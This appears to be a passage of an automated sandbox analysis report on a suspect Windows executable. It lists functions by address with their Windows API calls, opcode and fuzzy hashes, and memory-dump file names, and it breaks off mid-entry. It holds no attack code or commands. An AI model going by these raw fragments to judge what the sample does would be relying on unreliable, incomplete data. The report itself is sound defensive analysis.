                          • Instruction ID: a67f301955fa1a74a0722ec6c23b6175cbcefebe686d6e817204a4a848ee91ba
                          • Opcode Fuzzy Hash: 0c0438bf49a932e3f5febb735295a47a27de585b5bc9a99edfb681ef569dbb5d
                          • Instruction Fuzzy Hash: D011293A200301ABCF155F38C844D7A77E9FF45394B40802AFC43C72A4EB399801C765
                          Function 00797CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                          Download Yara Rule
                          APIs
                          • GetWindowLongW.USER32(?,000000F0), ref: 00797D0B
                          • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00797D2A
                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00797D42
                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0077B7AD,00000000), ref: 00797D6B
                            • Part of subcall function 00719BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00719BB2
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Window$Long
                          • String ID:
                          • API String ID: 847901565-0
                          • Opcode ID: 32e8d5126b674f0986d112506650f518ef08b1bef2b564bf1c0e9603d114d61a
                          • Instruction ID: 819b89e0c82dbe8851051efae29bd9212bdb68971deca35d1c62840de718cab3
                          • Opcode Fuzzy Hash: 32e8d5126b674f0986d112506650f518ef08b1bef2b564bf1c0e9603d114d61a
                          • Instruction Fuzzy Hash: 3D11CD71225654AFCF158F28EC04AA63BA4AF46360F218325F839CB2F0E7389D51DB60
                          Function 00795660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,00001060,?,00000004), ref: 007956BB
                          • _wcslen.LIBCMT ref: 007956CD
                          • _wcslen.LIBCMT ref: 007956D8
                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00795816
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessageSend_wcslen
                          • String ID:
                          • API String ID: 455545452-0
                          • Opcode ID: bbd5eeeec076e389e0c3e93f3e50e528e73ec3566dee459c20f428e063de5601
                          • Instruction ID: 26b665221c0424ebe4ea76aba1897a9e72e184119fb7387140eb9fcca0fed558
                          • Opcode Fuzzy Hash: bbd5eeeec076e389e0c3e93f3e50e528e73ec3566dee459c20f428e063de5601
                          • Instruction Fuzzy Hash: BA11D371600628A6DF21DF61EC85EEE77BCEF11B60B50806AF915D6081E778DA80CB64
                          Function 00761A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00761A47
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00761A59
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00761A6F
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00761A8A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: 0cf8e91a6e0572fe97eb19c511c6c1ba92ad1f7a48002957f76679db5c9f1c90
                          • Instruction ID: 20b95d5dd85ecc077f7056abf71e62bc48ea07b24a6194aae2275c3bb9cf3852
                          • Opcode Fuzzy Hash: 0cf8e91a6e0572fe97eb19c511c6c1ba92ad1f7a48002957f76679db5c9f1c90
                          • Instruction Fuzzy Hash: 2A11573A901219FFEB10DBA4CD88FADBB78EB08350F204092EA01B7290C6716E50DB94
                          Function 0076E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 0076E1FD
                          • MessageBoxW.USER32(?,?,?,?), ref: 0076E230
                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0076E246
                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0076E24D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                          • String ID:
                          • API String ID: 2880819207-0
                          • Opcode ID: 4bbe011e20ebec5b77297f0d18a203d64743bd4913abe51d71851b1404ca808d
                          • Instruction ID: 4bacd2118daf286fbfcd0e6d44b48b1c2a39d2f7fe355812179c73b47737ebe3
                          • Opcode Fuzzy Hash: 4bbe011e20ebec5b77297f0d18a203d64743bd4913abe51d71851b1404ca808d
                          • Instruction Fuzzy Hash: 8A112B76904218BFCB019FA8DC09A9E7FBDBB45310F008216F815E3290D278CD0487B4
                          Function 0072D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                          Download Yara Rule
                          APIs
                          • CreateThread.KERNEL32(00000000,?,0072CFF9,00000000,00000004,00000000), ref: 0072D218
                          • GetLastError.KERNEL32 ref: 0072D224
                          • __dosmaperr.LIBCMT ref: 0072D22B
                          • ResumeThread.KERNEL32(00000000), ref: 0072D249
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Thread$CreateErrorLastResume__dosmaperr
                          • String ID:
                          • API String ID: 173952441-0
                          • Opcode ID: 5d540d15dbec1ab67dc6ceb561568b74d411f08a67a9a2c69e84cc2bebd6b3ce
                          • Instruction ID: c8c4f5d38273c8ba05d9975d12025ef79a20f12cd42e320264237d46dee50443
                          • Opcode Fuzzy Hash: 5d540d15dbec1ab67dc6ceb561568b74d411f08a67a9a2c69e84cc2bebd6b3ce
                          • Instruction Fuzzy Hash: E901D676405128FBDB315BA5EC0DBAE7AADEF81330F104219F925921D0DB788D01C6A1
                          Function 0070600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                          Download Yara Rule
                          APIs
                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0070604C
                          • GetStockObject.GDI32(00000011), ref: 00706060
                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 0070606A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CreateMessageObjectSendStockWindow
                          • String ID:
                          • API String ID: 3970641297-0
                          • Opcode ID: a7c9cb78151bf32709c542e41059ae788d1f78b8fd3da8ac141bec287c2f8e83
                          • Instruction ID: 72afda662a3520c4ab8e3e3c9355f02ffbab305ef4e5a9aae1b4dc209bb418a4
                          • Opcode Fuzzy Hash: a7c9cb78151bf32709c542e41059ae788d1f78b8fd3da8ac141bec287c2f8e83
                          • Instruction Fuzzy Hash: 97116D72541549FFEF128FA4DC64EEABBA9EF083A4F044216FA1452150D73A9C60EBA4
                          Function 00723B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • ___BuildCatchObject.LIBVCRUNTIME ref: 00723B56
                            • Part of subcall function 00723AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00723AD2
                            • Part of subcall function 00723AA3: ___AdjustPointer.LIBCMT ref: 00723AED
                          • _UnwindNestedFrames.LIBCMT ref: 00723B6B
                          • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00723B7C
                          • CallCatchBlock.LIBVCRUNTIME ref: 00723BA4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                          • String ID:
                          • API String ID: 737400349-0
                          • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                          • Instruction ID: 3f8baac40f38f05141233b87a149fcfa5c20654ca4bafea4f94e70eee5f90325
                          • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                          • Instruction Fuzzy Hash: 55012972100158FBDF126E95EC46EEB3F7AEF48754F044018FE4856121C73AE961DBA0
                          Function 00733073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,007013C6,00000000,00000000,?,0073301A,007013C6,00000000,00000000,00000000,?,0073328B,00000006,FlsSetValue), ref: 007330A5
                          • GetLastError.KERNEL32(?,0073301A,007013C6,00000000,00000000,00000000,?,0073328B,00000006,FlsSetValue,007A2290,FlsSetValue,00000000,00000364,?,00732E46), ref: 007330B1
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0073301A,007013C6,00000000,00000000,00000000,?,0073328B,00000006,FlsSetValue,007A2290,FlsSetValue,00000000), ref: 007330BF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: LibraryLoad$ErrorLast
                          • String ID:
                          • API String ID: 3177248105-0
                          • Opcode ID: c6e5724527668037853f175e0750caa3a327bfb69454da8bae72a6373c1243e8
                          • Instruction ID: 3022bb7469cbd66ce67bcb950f19e04f722b65e496c298385037cbf0176e00ce
                          • Opcode Fuzzy Hash: c6e5724527668037853f175e0750caa3a327bfb69454da8bae72a6373c1243e8
                          • Instruction Fuzzy Hash: 50017B32301626ABEF354B78AC84A577B9AAF05B71F204721F945E7251C72DD902C6E4
                          Function 00767464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0076747F
                          • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00767497
                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 007674AC
                          • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 007674CA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Type$Register$FileLoadModuleNameUser
                          • String ID:
                          • API String ID: 1352324309-0
                          • Opcode ID: 52c03e1507d2cded980d9b042d2fceb837dda005c6ccc00218b1446cb7b96531
                          • Instruction ID: 0ad3c6c9393692007e18a1596deb9523e99bf0cde74e1239a4af972b38740db1
                          • Opcode Fuzzy Hash: 52c03e1507d2cded980d9b042d2fceb837dda005c6ccc00218b1446cb7b96531
                          • Instruction Fuzzy Hash: 7711A1B52053549BE7208F14DD0CB927FFCEB40B98F10856AAA17D6151DB78E904DB60
                          Function 0076B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                          Download Yara Rule
                          APIs
                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0076ACD3,?,00008000), ref: 0076B0C4
                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0076ACD3,?,00008000), ref: 0076B0E9
                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0076ACD3,?,00008000), ref: 0076B0F3
                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0076ACD3,?,00008000), ref: 0076B126
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CounterPerformanceQuerySleep
                          • String ID:
                          • API String ID: 2875609808-0
                          • Opcode ID: 3e59085e5d376121402187c76842930da221c75eb1fe219da0e12633d783d124
                          • Instruction ID: 1a9451094f81d5d6e5ab67c9d289fd7329f3422aaee44e00900099632ab802c2
                          • Opcode Fuzzy Hash: 3e59085e5d376121402187c76842930da221c75eb1fe219da0e12633d783d124
                          • Instruction Fuzzy Hash: 42115E71C0151CE7CF049FE4D9596EEBF78FF0B711F108086D942B2285CB3895918B59
                          Function 00762DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00762DC5
                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00762DD6
                          • GetCurrentThreadId.KERNEL32 ref: 00762DDD
                          • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00762DE4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                          • String ID:
                          • API String ID: 2710830443-0
                          • Opcode ID: 03422e342c3f9145e9935a2e07e4a22f27996371674e1c5d2638c248374b357d
                          • Instruction ID: 25b0e48290dbc2355d109aae4d31432272ab549560567eb437af8fd788b1126e
                          • Opcode Fuzzy Hash: 03422e342c3f9145e9935a2e07e4a22f27996371674e1c5d2638c248374b357d
                          • Instruction Fuzzy Hash: DAE092712016247BDF211B729C0EFEB3E7CEF42BA1F404416F506D10919BA9C842C6B5
                          Function 00798863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00719639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00719693
                            • Part of subcall function 00719639: SelectObject.GDI32(?,00000000), ref: 007196A2
                            • Part of subcall function 00719639: BeginPath.GDI32(?), ref: 007196B9
                            • Part of subcall function 00719639: SelectObject.GDI32(?,00000000), ref: 007196E2
                          • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00798887
                          • LineTo.GDI32(?,?,?), ref: 00798894
                          • EndPath.GDI32(?), ref: 007988A4
                          • StrokePath.GDI32(?), ref: 007988B2
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                          • String ID:
                          • API String ID: 1539411459-0
                          • Opcode ID: 0a42ba464e5e794b0e87fb72becae56d16ca145a12210e868f7ee727235aca47
                          • Instruction ID: e7bbba84e4f55c959552ea35b84b1919ee8d72743b4f2305948925ceff0b044c
                          • Opcode Fuzzy Hash: 0a42ba464e5e794b0e87fb72becae56d16ca145a12210e868f7ee727235aca47
                          • Instruction Fuzzy Hash: 31F03A36042258FADF136F98AC09FCA3B69AF06310F44C002FA11651E1C77D5552CBB9
                          Function 007198B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                          Download Yara Rule
                          APIs
                          • GetSysColor.USER32(00000008), ref: 007198CC
                          • SetTextColor.GDI32(?,?), ref: 007198D6
                          • SetBkMode.GDI32(?,00000001), ref: 007198E9
                          • GetStockObject.GDI32(00000005), ref: 007198F1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Color$ModeObjectStockText
                          • String ID:
                          • API String ID: 4037423528-0
                          • Opcode ID: 62618496d28efd6ac3c096742d3b4327016c30edf44c50cae7cc6329bbf09045
                          • Instruction ID: 15e68ab3c58930be76ac6af3996a610916851c1ef10c88db564f42c229a39bc6
                          • Opcode Fuzzy Hash: 62618496d28efd6ac3c096742d3b4327016c30edf44c50cae7cc6329bbf09045
                          • Instruction Fuzzy Hash: 82E06531284284ABDF225B74BC09BD83F10AB11336F14C21AF7FA540E1C7794656DB14
                          Function 0076162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentThread.KERNEL32 ref: 00761634
                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,007611D9), ref: 0076163B
                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,007611D9), ref: 00761648
                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,007611D9), ref: 0076164F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CurrentOpenProcessThreadToken
                          • String ID:
                          • API String ID: 3974789173-0
                          • Opcode ID: 30bf8eace3dae4a93af4361685729c29f51ab4f99fd6709d11b833bb4a2f5e20
                          • Instruction ID: 0c2e4cfa597e0e3411580e25f532644ef8cf8820496d27ecc877e1a842812c6c
                          • Opcode Fuzzy Hash: 30bf8eace3dae4a93af4361685729c29f51ab4f99fd6709d11b833bb4a2f5e20
                          • Instruction Fuzzy Hash: 21E08635601211EBDF201FA49E0DB463B7CAF44791F18C809F646C9080DA3C4442C768
                          Function 0075D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                          Download Yara Rule
                          APIs
                          • GetDesktopWindow.USER32 ref: 0075D858
                          • GetDC.USER32(00000000), ref: 0075D862
                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0075D882
                          • ReleaseDC.USER32(?), ref: 0075D8A3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CapsDesktopDeviceReleaseWindow
                          • String ID:
                          • API String ID: 2889604237-0
                          • Opcode ID: aa4539626b0cd13a67a34813e5768ced331778af6b4c18ab9c5ab51b781b264f
                          • Instruction ID: f47d573fff518af89bf55fa3b0d2f6811fafa02b824f14156a70862413eb15e0
                          • Opcode Fuzzy Hash: aa4539626b0cd13a67a34813e5768ced331778af6b4c18ab9c5ab51b781b264f
                          • Instruction Fuzzy Hash: 61E01AB1800205DFCF529FA4D80C66DBBB1FB08311F14C00AE806E7250CB3D9942AF54
                          Function 0075D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                          Download Yara Rule
                          APIs
                          • GetDesktopWindow.USER32 ref: 0075D86C
                          • GetDC.USER32(00000000), ref: 0075D876
                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0075D882
                          • ReleaseDC.USER32(?), ref: 0075D8A3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CapsDesktopDeviceReleaseWindow
                          • String ID:
                          • API String ID: 2889604237-0
                          • Opcode ID: 582d8bc828069f354b04d531cf6bce1fa9e60182f23c415e7c6a54470c295eee
                          • Instruction ID: 1bd49285ec1dcac16ae3defd51bfe333b6bf036ecafa7a60a0fcce168119a79c
                          • Opcode Fuzzy Hash: 582d8bc828069f354b04d531cf6bce1fa9e60182f23c415e7c6a54470c295eee
                          • Instruction Fuzzy Hash: EAE092B5800205EFCF52AFA4D80C66DBBB5BB08311F14954AE94AE7290DB3DA942AF54
                          Function 00774D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00707620: _wcslen.LIBCMT ref: 00707625
